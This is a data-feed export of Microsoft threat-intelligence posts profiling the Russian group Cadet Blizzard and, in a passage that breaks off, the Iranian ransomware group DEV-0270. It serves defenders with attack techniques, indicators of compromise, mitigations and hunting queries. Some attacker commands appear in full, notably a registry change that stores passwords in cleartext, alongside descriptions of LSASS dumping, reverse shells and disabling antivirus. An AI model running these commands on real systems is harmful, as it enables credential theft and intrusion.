"authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-8464", "CVE-2019-0708", "CVE-2020-0796", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-07-29T19:00:59", "id": "MMPC:4A6B394DCAF12E05136AE087248E228C", "href": "https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T23:55:14", "description": "As Russia\u2019s invasion of Ukraine continues into its second year and Microsoft continues to collaborate with global partners in response, the exposure of destructive cyber capabilities and information operations provide greater clarity into the tools and techniques used by Russian state-sponsored threat actors. Throughout the conflict, Russian threat actors have deployed a variety of destructive capabilities with varying levels of sophistication and impact, which showcase how malicious actors rapidly implement novel techniques during a hybrid war, along with the practical limitations of executing destructive campaigns when significant operational errors are made and the security community rallies around defense. These insights help security researchers continuously refine detection and mitigation capabilities to defend against such attacks as they evolve in a wartime environment.\n\nToday, Microsoft Threat Intelligence is sharing updated details about techniques of a threat actor formerly tracked as [DEV-0586](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>)\u2014a distinct Russian state-sponsored threat actor that has now been elevated to the name Cadet Blizzard. As a result of our investigation into their intrusion activity over the past year, we have gained high confidence in our analysis and knowledge of the actor\u2019s tooling, victimology, and motivation, meeting the criteria to convert this group to a [named threat actor](<https://www.microsoft.com/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/>). \n\nMicrosoft assesses that Cadet Blizzard operations are [associated with the Russian General Staff Main Intelligence Directorate (GRU)](<https://blogs.microsoft.com/on-the-issues/2023/06/14/russian-cyberattacks-ukraine-cadet-blizzard/>) but are separate from other known and more established GRU-affiliated groups such as Forest Blizzard (STRONTIUM) and Seashell Blizzard (IRIDIUM). While Microsoft constantly tracks a number of activity groups with varying degrees of Russian government affiliation, the emergence of a novel GRU affiliated actor, particularly one which has conducted destructive cyber operations likely supporting broader military objectives in Ukraine, is a notable development in the Russian cyber threat landscape. A month before Russia invaded Ukraine, Cadet Blizzard foreshadowed future destructive activity when it created and deployed [WhisperGate](<https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/>), a destructive capability that wipes Master Boot Records (MBRs), against Ukrainian government organizations. Cadet Blizzard is also linked [to the defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of several Ukrainian organization websites, as well as multiple operations, including the hack-and-leak forum known as \u201cFree Civilian\u201d.\n\nMicrosoft has tracked Cadet Blizzard since the deployment of WhisperGate in January 2022. We assess that they have been operational in some capacity since at least 2020 and continue to perform network operations through the present. Operationally consistent with the remit and assessed objectives of GRU-led operations throughout Russia\u2019s invasion of Ukraine, Cadet Blizzard has engaged in focused destructive attacks, espionage, and information operations in regionally significant areas. Cadet Blizzard\u2019s operations, though comparatively less prolific in both scale and scope to more established threat actors such as Seashell Blizzard, are structured to deliver impact and frequently run the risk of hampering continuity of network operations and exposing sensitive information through targeted hack-and-leak operations. Primary targeted sectors include government organizations and information technology providers in Ukraine, although organizations in Europe and Latin America have also been targeted.\n\nMicrosoft has been [working with CERT-UA](<https://blogs.microsoft.com/on-the-issues/2022/11/03/our-tech-support-ukraine/#:~:text=Since%20the%20war%20began%20in%20February%2C%20Microsoft%20and,critical%20Ukrainian%20services%20through%20data%20centers%20across%20Europe.>) closely since the beginning of Russia\u2019s war in Ukraine and continues to support the country and neighboring states in protecting against cyberattacks, such as the ones carried out by Cadet Blizzard. As with any observed nation-state actor activity, Microsoft directly and proactively notifies customers that have been targeted or compromised, providing them with the information they need to guide their investigations. Microsoft is also actively working with members of the global security community and other strategic partners to share information that can address this evolving threat through multiple channels. Having elevated this activity to a distinct threat actor name, we\u2019re sharing this information with the larger security community to provide insights to protect and mitigate Cadet Blizzard as a threat. Organizations should actively take steps to protect environments against Cadet Blizzard, and this blog further aims to discuss how to detect and prevent disruption.\n\n## Who is Cadet Blizzard?\n\nCadet Blizzard is a Russian GRU-sponsored threat group that Microsoft began tracking following disruptive and destructive events occurring at multiple government agencies in Ukraine in mid-January 2022. During this time, Russian troops backed with tanks and artillery were surrounding the Ukrainian border as the military prepped for an offensive attack. The [defacements](<https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>) of key Ukrainian institutions\u2019 websites, coupled with the WhisperGate malware, prefaced [multiple waves of attacks](<https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd>) by Seashell Blizzard that followed when the Russian military began their ground offensive a month later.\n\nCadet Blizzard compromises and maintains a foothold on affected networks for months, often exfiltrating data prior to disruptive actions. Microsoft observed Cadet Blizzard\u2019s activity peak between January and June 2022, followed by an extended period of reduced activity. The group re-emerged in January 2023 with increased operations against multiple entities in Ukraine and in Europe, including another round of website defacements and a new \u201cFree Civilian\u201d Telegram channel affiliated with the hack-and-leak front under the same name that first emerged in January 2022, around the same time as the initial defacements. Cadet Blizzard actors are active seven days of the week and have conducted their operations during their primary European targets\u2019 off-business hours. Microsoft assesses that NATO member states involved in providing military aid to Ukraine are at greater risk.\n\n![Cadet Blizzard heatmap displaying their operational cadence by the day of the week and active times \$UTC\$. ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-1.-A-heatmap-of-the-operational-cadence-of-Cadet-Blizzard.webp)Figure 1. A heatmap of the operational cadence of Cadet Blizzard\n\nCadet Blizzard seeks to conduct disruption, destruction, and information collection, using whatever means are available and sometimes acting in a haphazard fashion. While the group carries high risk due to their destructive activity, they appear to operate with a lower degree of operational security than that of longstanding and advanced Russian groups such as Seashell Blizzard and Forest Blizzard. Additionally, as is the case with other Russian state-sponsored threat groups, Microsoft assesses that at least one Russian private sector organization has materially supported Cadet Blizzard by providing operational support including during the WhisperGate destructive attack.\n\n### Targets\n\nCadet Blizzard\u2019s operations are global in scope but consistently affect regional hotspots in Ukraine, Europe, Central Asia, and, periodically, Latin America. Cadet Blizzard likely prioritizes target networks based on requirements consistent with Russian military or intelligence objectives such as geolocation or perceived impact. Cadet Blizzard, consistent with a Russian military-associated threat actor, continues to mainly target Ukraine, although the relative scope of impact of Cadet Blizzard\u2019s destructive activity is minimal compared to the multiple waves of destructive attacks that we attribute to Seashell Blizzard. In January 2022, Cadet Blizzard launched destructive attacks in Ukraine in the following industry verticals:\n\n * Government services\n * Law enforcement\n * Non-profit/non-governmental organization\n * IT service providers/consulting\n * Emergency services\n\nCadet Blizzard has repeatedly targeted information technology providers and software developers that provide services to government organizations using a supply chain \u201ccompromise one, compromise many\u201d technique. The group\u2019s January 2022 compromise of government entities in Ukraine probably were at least in part due to access and information gained during a breach of an information technology provider that often worked with these organizations.\n\nPrior to the war in Ukraine, Cadet Blizzard performed historical compromises of several Eastern European entities as well, primarily affecting the government and technology sectors as early as April 2021. As the war continues, Cadet Blizzard activity poses an increasing risk to the broader European community, specifically any successful attacks against governments and IT service providers, which may give the actor both tactical and strategic-level insight into Western operations and policy surrounding the conflict. Gaining heightened levels of access into these targeted sectors may also enable Cadet Blizzard to carry out retaliatory demonstrations in opposition to the West\u2019s support for Ukraine.\n\n### Tools, tactics, and procedures\n\nCadet Blizzard is a conventional network operator and commonly utilizes living-off-the-land techniques after gaining initial access to move laterally through the network, collect credentials and other information, and deploy defense evasion techniques and persistence mechanisms. Unlike other Russian-affiliated groups that historically prefer to remain undetected to perform espionage, the result of at least some notable Cadet Blizzard operations are extremely disruptive and are almost certainly intended to be public signals to their targets to achieve the larger objective of destruction, disruption, and possibly, intimidation.\n\n![Cadet Blizzard's operational lifecycle includes exploiting servers, deploying web shells, pushing tunneling tools, and pivoting to internal networks for initial access. Lateral movement follows, which includes credential access via process dumping, interactive reverse shell via netcat/GOST, command execution via Impacket, disabling antivirus services, and wiping logs. Cadet Blizzard's action on objectives then include exfiltrating data, deploying destructive payloads, and leaking data or targeted information operations.](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-3.-Cadet-Blizzards-normal-operational-lifecycle-1-1024x347.webp)Figure 2. Cadet Blizzard's normal operational lifecycle\n\n**Initial access**\n\nCadet Blizzard predominantly achieves initial access through exploitation of web servers commonly found on network perimeters and DMZs. Cadet Blizzard is also known for exploiting Confluence servers through the CVE-2021-26084 vulnerability, Exchange servers through multiple vulnerabilities including CVE-2022-41040 and ProxyShell, and likely commodity vulnerabilities in various open-source platforms such as content management systems.\n\n**Persistence**\n\nCadet Blizzard frequently persists on target networks through the deployment of commodity web shells used either for commanding or tunneling. Commonly utilized web shells include [P0wnyshell](<https://github.com/flozz/p0wny-shell>), [reGeorg](<https://github.com/sensepost/reGeorg>), PAS, and even custom variants included in publicly available exploit kits.\n\nIn February 2023, [CERT-UA reported](<https://cert.gov.ua/article/3947787>) an attempted attack against a Ukrainian state information system that involved a variant of the PAS web shell, which Microsoft assesses to be unique to Cadet Blizzard operations at the time of the intrusion.\n\n**Privilege escalation and credential harvesting** \nCadet Blizzard has leveraged a variety of living-off-the-land techniques to conduct privilege escalation and harvesting of credentials.\n\n * Dumping LSASS \u2013 Cadet Blizzard uses Sysinternals tools such as _procdump_ to dump LSASS in suspected offline credential harvesting efforts. Cadet Blizzard frequently renames _procdump64_ to alternative names, such as _dump64.exe_.\n * Dumping registry hives \u2013 Cadet Blizzard extracts registry hives using native means via _reg save_.\n\n**Lateral movement** \nCadet Blizzard conducts lateral movement with valid network credentials obtained from credential harvesting. To conduct lateral movement more efficiently, Cadet Blizzard typically uses modules from the publicly available [Impacket framework](<https://github.com/fortra/impacket>). While this framework is generically utilized by multiple actors, preferential execution of patterns of commands may allow for more precision profiling of Cadet Blizzard operations:\n\n * PowerShell _get-volume_ to enumerate the volume of a device\n![Code displaying the PowerShell get-volume command.](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-3.-PowerShell-get-volume-command-1024x40.webp)Figure 3. PowerShell _get-volume_ command\n\n * Copying critical registry hives that contain password hashes and computer information\n![Code displaying copying of critical registry hives](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-4.-Copying-critical-registry-hives-1024x70.webp)Figure 4. Copying critical registry hives\n\n * Downloading files directly from actor-owned infrastructure via the PowerShell _DownloadFile_ commandlet\n![Code displaying PowerShell DownloadFile commandlet](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-5.-PowerShell-DownloadFile-commandlet-1024x97.webp)Figure 5. PowerShell _DownloadFile_ commandlet\n\n**Command execution and C2**\n\nCadet Blizzard periodically uses generic socket-based tunneling utilities to facilitate command and control (C2) to actor-controlled infrastructure. Payloads such as NetCat and Go Simple Tunnel (GOST) are commonly renamed to blend into the operating system but are used to shovel interactive command prompts over established sockets. Frequently, remote command execution may be facilitated through remotely scheduled tasks. The group has also sparingly utilized Meterpreter.\n\n![Code displaying a scheduled task creating a reverse shell](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-6.-Scheduled-task-creating-a-reverse-shell-1024x104.webp)Figure 6. Scheduled task creating a reverse shell\n\n**Operational security**\n\nCadet Blizzard utilizes anonymization services IVPN, SurfShark, and Tor as their anonymization layer during select operations.\n\n**Anti-forensics** \nCadet Blizzard has been observed leveraging the _Win32_NTEventlogFile_ commandlet in PowerShell to extract both system and security event logs to an operational directory. The activities are anticipated to be consistent with anti-forensics activities.\n\n * Common file targets during extraction are:\n * _sec.evtx_\n * _sys.evtx_\n * Cadet Blizzard commonly deletes files used during operational phases seen in lateral movement.\n * Cadet Blizzard malware implants are known to disable Microsoft Defender Antivirus through a variety of means:\n * _NirSoft AdvancedRun_ utility, which is used to disable Microsoft Defender Antivirus by stopping the _WinDefend_ service.\n * _Disable Windows Defender.bat,_ which presumably disables Microsoft Defender Antivirus via the registry.\n![Code displaying the addition of registry keys to disable Windows Defender](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-7.-Addition-of-registry-key-to-disable-Windows-Defender-1024x66.webp)Figure 7. Addition of registry key to disable Microsoft Defender Antivirus\n\n**Impact assessment**\n\nCadet Blizzard typically collects information en-masse from targeted servers. If mail servers are affected, Cadet Blizzard typically attempts to collect mail, placing incident response communications at risk. Credential material (such as SSH keys) are also a common target to provide methods for re-entry if a full remediation does not occur. As was the case with the WhisperGate operation in January 2022, Cadet Blizzard is known to deploy destructive malware to select target environments to delete data and render systems inoperable.\n\nAlso in January of 2022, Microsoft identified that data exfiltrated by Cadet Blizzard in compromises of various Ukrainian organizations was leaked on a Tor .onion site under the name \u201cFree Civilian.\u201d The organizations from which data was leaked strongly correlated to multiple Cadet Blizzard compromises earlier in 2022, leading Microsoft to assess that this forum is almost certainly linked to Cadet Blizzard. In February 2023, a new Telegram channel was established under the same \u201cFree Civilian\u201d moniker, suggesting that Cadet Blizzard intends to continue conducting information operations in the second year of the war. However, the public channel only has 1.3K followers with posts getting at most a dozen reactions as of the time of publication, signifying low user interaction. A private channel assumed to be operated by the same group appears to have shared data with 748 of those subscribers.\n\n![Screenshot of the Free Civilian hack-and-leak front, including links to \"stay in touch\".](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/06/Figure-8.-Free-Civilian-hack-and-leak-front.webp)Figure 8. Free Civilian hack-and-leak front\n\n### Related ecosystems\n\nCadet Blizzard operations do not occur in a silo; there have been substantial technical indicators of intersection with other malicious cyber activity that may have a broader scope or a nexus outside of Russia. They have at times utilized services associated with these ecosystems such as Storm-0587, discussed below, as well as having support from at least one private sector enabler organization within Russia. Though there have been various forms of intersections in threat activity, when these groups have been observed operating independently, the tactics, techniques, procedures (TTPs) and capabilities have often been distinct\u2014therefore making it operationally valuable to distinguish these activity groups.\n\n**Storm-0587**\n\nStorm-0587 is a cluster of activity beginning as early as April 2021 involving a series of weaponized documents predominantly delivered in phishing operations usually to distribute a series of downloaders and [document stealers](<https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>). One of Storm-0587's trademark tools is [SaintBot](<https://www.malwarebytes.com/blog/threat-intelligence/2021/04/a-deep-dive-into-saint-bot-downloader>), an uncommon downloader that often appears in spear-phishing emails. This downloader can be customized to deploy almost anything as the payload, but in Ukraine, the malware often deploys a version of an [AutoIT information stealer](<https://gist.github.com/malwarezone/119bed274bc77b52122fa118f0a72618#file-stealer-au3-L2880>) that collects documents on the machine that threat actors deem of interest. This specific version of the malware has been named [OUTSTEEL by CERT UA](<https://cert.gov.ua/article/18419>) and has been observed in several attacks, such as a fake version of the Office of the President of Ukraine\u2019s website created in July 2021 that hid weaponized documents, including OUTSTEEL, that would download onto victim\u2019s machines when the documents are clicked.\n\n## Mitigation and protection guidance\n\n### Defending against Cadet Blizzard\n\nActivities linked to Cadet Blizzard indicate that they are comprehensive in their approach and have demonstrated an ability to hold networks at risk of continued compromise for an extended period of time. A comprehensive approach to incident response may be required in order to fully remediate from Cadet Blizzard operations. Organizations can bolster security of information assets and expedite incident response by focusing on areas of risk based on actor tradecraft enumerated within this report. Use the included indicators of compromise to investigate environments and assess for potential intrusion.\n\n * Review all authentication activity for remote access infrastructure, with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use password-less solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure accounts.\n * Enable [controlled folder access (CFA)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/controlled-folders>) to prevent MBR/VBR modification.\n * [Block process creations originating from PSExec and WMI commands](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules-reference#block-process-creations-originating-from-psexec-and-wmi-commands>) to stop lateral movement utilizing the WMIexec component of Impacket.\n * Turn on [cloud-delivered protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus>) in Microsoft Defender Antivirus, turned on by default in Windows, or the equivalent for your chosen antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n\n### Hunting for Cadet Blizzard hands-on-keyboard activity\n\nTo uncover malicious hands-on-keyboard activities in environments, identify any unusual or unexpected commands or tools launched on systems as well as the presence of any unusual directories or files that could be used for staging or storing malicious tools. Use the common commands, tools, staging directories, and indicators of compromise listed below to help identify Cadet Blizzard intrusion and hands-on-keyboard activity in environments.\n\n**Common commands**\n\n * _systeminfo_ to fingerprint a device after lateral movement\n * _get-volume_ to fingerprint a device after lateral movement\n * _nslookup_ to research specific devices (IP) and FQDNs internally\n * _Get-DnsServerResourceRecord_ to conduct reconnaissance of an internal DNS namespace\n * _query session_ to profile RDP connections\n * _route print_ to enumerate routes available on the devices\n * _DownloadFile_ via PowerShell to download payloads from external servers\n\n**Common tool staging directories**\n\n * _C:\\ProgramData_\n * _C:\\PerfLogs_\n * _C:\\Temp_\n * _C:\\_\n * Subdirectories of legitimate (or fake) user accounts within _%APPDATA%\\Temp_\n * Subdirectories with the name _USOPublic _in the path\n\n**Common tools**\n\n * Tor\n * Python\n * SurfShark\n * Teamviewer\n * Meterpreter named as _dbus-rpc.exe_ in known instances\n * IVPN\n * NGROK\n * _GOST.exe_ frequently masked as _USORead.exe_****\n * regeorg web shell\n\n**Indicators of compromise (IOCs)**\n\nIOC| Type| Description \n---|---|--- \njusticeua[.]org| Domain| Sender for non-weaponized emails containing only antagonistic messaging: _volodimir_azov@justiceua[.]org_ \n179.43.187[.]33| IP address| Hosted the JusticeUA operation between March and April 2022 \n3a2a2de20daa74d8f6921230416ed4e6| PE Import Hash| PE Import Hash matching WhisperGate malware \n3e4bb8089657fef9b8e84d9e17fd0d7740853c4c0487081dacc4f22359bade5c| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n20215acd064c02e5aa6ae3996b53f5313c3f13625a63da1d3795c992ea730191| SHA-256| Web shell - p0wnyshell (not unique to Cadet Blizzard) \n3fe9214b33ead5c7d1f80af469593638b9e1e5f5730a7d3ba2f96b6b555514d4| SHA-256| Web shell - WSO Shell (not unique to Cadet Blizzard) \n23d6611a730bed886cc3b4ce6780a7b5439b01ddf6706ba120ed3ebeb3b1c478| SHA-256| Web shell \u2013 reGeorg (not unique to Cadet Blizzard) \n7fedaf0dec060e40cbdf4ec6d0fbfc427593ad5503ad0abaf6b943405863c897| SHA-256| Web shell \u2013 PAS (may not be unique to Cadet Blizzard) \n \n### Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects behavioral components of techniques this threat actor uses as the following:\n\n * Behavior:Win32/WmiprvseRemoteProc\n\nMicrosoft Defender Antivirus detects the WhisperGate malware attributed to this threat actor with the following family:\n\n * WhisperGate\n\n**Microsoft Defender for Endpoint**\n\nThe following Microsoft Defender for Endpoint alerts can indicate associated threat activity:\n\n * Cadet Blizzard activity detected\n * Possible Storm-0587 activity detected\n\nThe following alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * Ongoing hands-on-keyboard attack via Impacket toolkit\n * Suspicious PowerShell command line\n * Suspicious WMI process creation\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-26084\n * CVE-2020-1472\n * CVE-2021-4034\n\n### Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\nCheck for WMIExec Impacket activity with common Cadet Blizzard commands\n \n \n DeviceProcessEvents\n | where InitiatingProcessFileName =~ \"WmiPrvSE.exe\" and FileName =~ \"cmd.exe\"\n | where ProcessCommandLine matches regex \"2>&1\"\n | where ProcessCommandLine has_any (\"get-volume\",\"systeminfo\",\"reg.exe\",\"downloadfile\",\"nslookup\",\"query session\",\"route print\")\n \n\nFind PowerShell file downloads\n \n \n DeviceProcessEvents\n | where FileName == \"powershell.exe\" and ProcessCommandLine has \"DownloadFile\"\n \n\nScheduled task creation, command execution and C2 communication\n \n \n DeviceProcessEvents \n | where Timestamp > ago(14d) \n | where FileName =~ \"schtasks.exe\" \n | where (ProcessCommandLine contains \"splservice\" or ProcessCommandLine contains \"spl32\") and \n (ProcessCommandLine contains \"127.0.0.1\" or ProcessCommandLine contains \"2>&1\")\n \n\n### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u201cTI map\u201d) to automatically match indicators associated with Cadet Blizzard in Microsoft Defender Threat Intelligence (MDTI) with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the MDTI connector and analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>.\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [Web Shell Activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web Shells Threat Protection/Hunting Queries/WebShellActivity.yaml>)\n * [Commands executed by WMI](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Windows Security Events/Hunting Queries/CommandsexecutedbyWMIonnewhosts-potentialImpacket.yaml>)\n * [Potential Impacket Execution](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Attacker Tools Threat Protection Essentials/Hunting Queries/PotentialImpacketExecution.yaml>)\n * [Dumping LSASS using procdump](<https://github.com/Azure/Azure-Sentinel/blob/ccbb0e644810e0edf3b8ee4f284fd05ea1cc46ad/Hunting%20Queries/Microsoft%20365%20Defender/Credential%20Access/procdump-lsass-credentials.yaml>)\n * [Potential Microsoft Defender Tampering](<https://github.com/Azure/Azure-Sentinel/blob/c5e3281a8a30ea658ce8f8234a182a63ceb996d7/Hunting%20Queries/Microsoft%20365%20Defender/Defense%20evasion/PotentialMicrosoftDefenderTampering%5BSolarigate%5D.yaml>)\n\n### References\n\n * <https://www.npr.org/2022/01/14/1073001754/ukraine-cyber-attack-government-websites-russia>\n * <https://github.com/flozz/p0wny-shell>\n * <https://github.com/sensepost/reGeorg>\n * <https://cert.gov.ua/article/3947787>\n * <https://github.com/fortra/impacket>\n * <https://intezer.com/blog/malware-analysis/targeted-phishing-attack-against-ukrainian-government-expands-to-georgia/>\n\n## Further reading\n\nFor the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: <https://aka.ms/threatintelblog>.\n\nTo get notified about new publications and to join discussions on social media, follow us on Twitter at <https://twitter.com/MsftSecIntel>.\n\nThe post [Cadet Blizzard emerges as a novel and distinct Russian threat actor](<https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-06-14T16:00:00", "type": "mmpc", "title": "Cadet Blizzard emerges as a novel and distinct Russian threat actor", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2021-26084", "CVE-2021-4034", "CVE-2022-41040"], "modified": "2023-06-14T16:00:00", "id": "MMPC:1AFF4881941FA1030862F773DC84A4A8", "href": "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-09-07T21:16:51", "description": "Microsoft threat intelligence teams have been tracking multiple ransomware campaigns and have tied these attacks to DEV-0270, also known as Nemesis Kitten, a sub-group of [Iranian actor PHOSPHORUS](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>). Microsoft assesses with moderate confidence that DEV-0270 conducts malicious network operations, including widespread vulnerability scanning, on behalf of the government of Iran. However, judging from their geographic and sectoral targeting, which often lacked a strategic value for the regime, we assess with low confidence that some of DEV-0270\u2019s ransomware attacks are a form of moonlighting for personal or company-specific revenue generation. This blog profiles the tactics and techniques behind the DEV-0270/PHOSPHORUS ransomware campaigns. We hope this analysis, which Microsoft is using to protect customers from related attacks, further exposes and disrupts the expansion of DEV-0270\u2019s operations.\n\nDEV-0270 leverages exploits for high-severity vulnerabilities to gain access to devices and is known for the early adoption of newly disclosed vulnerabilities. DEV-0270 also extensively uses living-off-the-land binaries (LOLBINs) throughout the attack chain for discovery and credential access. This extends to its abuse of the built-in BitLocker tool to encrypt files on compromised devices.\n\nIn some instances where encryption was successful, the time to ransom (TTR) between initial access and the ransom note was around two days. The group has been observed demanding USD 8,000 for decryption keys. In addition, the actor has been observed pursuing other avenues to generate income through their operations. In one attack, a victim organization refused to pay the ransom, so the actor opted to post the stolen data from the organization for sale packaged in an SQL database dump.\n\nUsing these observations, this blog details the group\u2019s tactics and techniques across its end-to-end attack chain to help defenders identify, investigate, and mitigate attacks. We also provide extensive hunting queries designed to surface stealthy attacks. This blog also includes protection and hardening guidance to help organizations increase resilience against these and similar attacks.\n\n![Infection chain describing the usual tactics and techniques used by DEV-0270 actor group.](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/fig1-DEV-0270-attack-chain.png)Figure 1. Typical DEV-0270 attack chain\n\n## Who is DEV-0270?\n\nMicrosoft assesses that DEV-0270 is operated by a company that functions under two public aliases: Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). We have observed numerous infrastructure overlaps between DEV-0270 and Secnerd/Lifeweb. These organizations are also linked to Najee Technology Hooshmand (\u0646\u0627\u062c\u06cc \u062a\u06a9\u0646\u0648\u0644\u0648\u0698\u06cc \u0647\u0648\u0634\u0645\u0646\u062f), located in Karaj, Iran.\n\nThe group is typically opportunistic in its targeting: the actor scans the internet to find vulnerable servers and devices, making organizations with vulnerable and discoverable servers and devices susceptible to these attacks.\n\nAs with any observed nation state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or a developing cluster of threat activity, allowing Microsoft Threat Intelligence Center (MSTIC) to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\n## Observed actor activity\n\n### Initial access\n\nIn many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon\u2014this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes. While there have been indications that DEV-0270 attempted to exploit [Log4j 2 vulnerabilities](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>), Microsoft has not observed this activity used against customers to deploy ransomware.\n\n### Discovery\n\nUpon gaining access to an organization, DEV-0270 performs a series of discovery commands to learn more about the environment. The command [_wmic_](<https://docs.microsoft.com/windows/win32/wmisdk/wmic>)_ computersystem get domain _obtains the target\u2019s domain name. The _whoami_ command displays user information and _net user_ command is used to add or modify user accounts. For more information on the accounts created and common password phrases DEV-0270 used, refer to the Advanced Hunting section.\n\n * wmic computersystem get domain\n * whoami\n * net user\n\nOn the compromised Exchange server, the actor used the following command to understand the target environment.\n \n \n Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders\n\nFor discovery of domain controllers, the actor used the following PowerShell and WMI command.\n\n![](https://www.microsoft.com/security/blog/uploads/securityprod/2022/09/DEV-0270-powershell-1-63182c0939f00.png)\n\n### Credential access\n\nDEV-0270 often opts for a particular method using a LOLBin to conduct their credential theft, as this removes the need to drop common credential theft tools more likely to be detected and blocked by antivirus and endpoint detection and response (EDR) solutions. This process starts by enabling WDigest in the registry, which results in passwords stored in cleartext on the device and saves the actor time by not having to crack a password hash.\n \n \n \"reg\" add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n\nThe actor then uses _rundll32.exe_ and _comsvcs.dll_ with its built-in MiniDump function to dump passwords from LSASS into a dump file. The command to accomplish this often specifies the output to save the passwords from LSASS. The file name is also reversed to evade detections (_ssasl.dmp)_:\n\n![Screenshot of a PowerShell 